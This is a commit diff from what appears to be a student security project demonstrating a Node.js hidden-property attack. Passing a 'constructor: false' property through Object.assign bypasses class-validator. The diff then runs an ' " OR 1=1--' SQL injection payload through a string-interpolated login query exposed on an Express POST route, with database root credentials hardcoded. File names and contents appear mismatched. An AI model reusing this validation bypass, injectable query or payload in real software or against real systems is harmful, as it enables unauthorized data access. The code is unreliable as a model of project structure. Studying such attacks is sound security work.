Class validation works with a post

Author: warrenbuhler

.vs/VSWorkspaceState.json

@@ -11,6 +11,6 @@
     "\\models",
     "\\routes"
   ],
-  "SelectedNode": "\\routes\\class-validator.routes.js",
+  "SelectedNode": "\\routes\\index.routes.js",
   "PreviewInSolutionExplorer": false
 }

.vs/abusing_hidden_properties_node_js_attack/v17/.suo

@@ -1,45 +1,68 @@
 var mysql = require('mysql2');
 var classValidator = require('class-validator');
+//var mysql = require('mysql2/promise')
 
-let requirements = {
-    host: 'localhost',
-    user: 'root',
-    password: 'compsec2',
-    database: 'sqldatabase'
-};
-var connection = mysql.createConnection(requirements);
-
-function bypassedValidation(emailInput, passwordInput) {
+function bypassedValidation(emailInput, passwordInput, connection) {
     const sqlquery1 = `SELECT * FROM login WHERE email = ${emailInput} AND password = ${passwordInput}`;
-    connection.query(sqlquery1, function (error, rows) {
-        if (error) throw error;
-        console.log(rows);
+    return new Promise(function (resolve, reject) {
+        connection.query(sqlquery1, function (error, rows) {
+            if (error) {
+                reject(new Error(error))
+            }
+            else {
+                resolve(rows);
+            }
+
+        });
     });
-    
-    return ;
+
 }
-class attackSchema {
+class intendedSchema {
     email;
     password
 }
+
 let param = {
     email: ' " OR 1=1--',
     password: ' " OR 1=1--',
     constructor: false
 };
 
-let test1Param = Object.assign(attackSchema, param);
-console.log("This is the merged schema:")
-console.log(test1Param);
 
 
-classValidator.validate(test1Param).then(errors => {
-    if (errors.length > 0) {
-        console.log('invalid email and or password, unable to validate user', errors);
-    } else {
-        console.log('valid email and password, user successfully validated. Relevant Database Information:');
-        bypassedValidation(test1Param.email, test1Param.password);
-    }
-});
+function jsonHandle(emailInput)
+{
+    console.log("into the json");
+    let requirements = {
+        host: 'localhost',
+        user: 'root',
+        password: 'compsec2',
+        database: 'sqldatabase'
+    };
+    var connection = mysql.createConnection(requirements);
+
+    let test1Param = Object.assign(intendedSchema, param);
+    console.log("This is the merged schema:")
+    console.log(test1Param);
+
+
+    return new Promise(function (resolve, reject) {
+        classValidator.validate(test1Param).then((errors) => {
+            if (errors.length > 0) {
+                console.log('invalid email and or password, unable to validate user', errors);
+                resolve("Class validator failed to validate user ");
+            } else {
+                console.log('valid email and password, user successfully validated. Relevant Database Information:');
+                bypassedValidation(test1Param.email, test1Param.password, connection).then((results) => {
+                    resolve(results);  
+                })
+
+            }
+        });
+    });
+
+}
 
-return;
+module.exports = {
+    jsonHandle
+}

.vs/slnx.sqlite

@@ -0,0 +1,13 @@
+const express = require('express')
+const router = express.Router()
+const class_validator = require('../class-validator/class-validator_handling')
+
+module.exports = router
+
+router.post('/', async (req, res) => {
+    let prom = class_validator.jsonHandle(req.body);
+    let resolved = Promise.resolve(prom)
+    resolved.then(function (values) {
+        res.json(values);
+    })
+})

class-validator/class-validator_handling.js

@@ -7,4 +7,5 @@ router.use('/component_type', require('./component_type_routes'))
 router.use('/jpv', require('./jpv.routes'))
 router.use('/bson', require('./bson.routes'))
 router.use('/kindof', require('./kindof.routes'))
+router.use('/class-validator', require('./class-validator.routes'))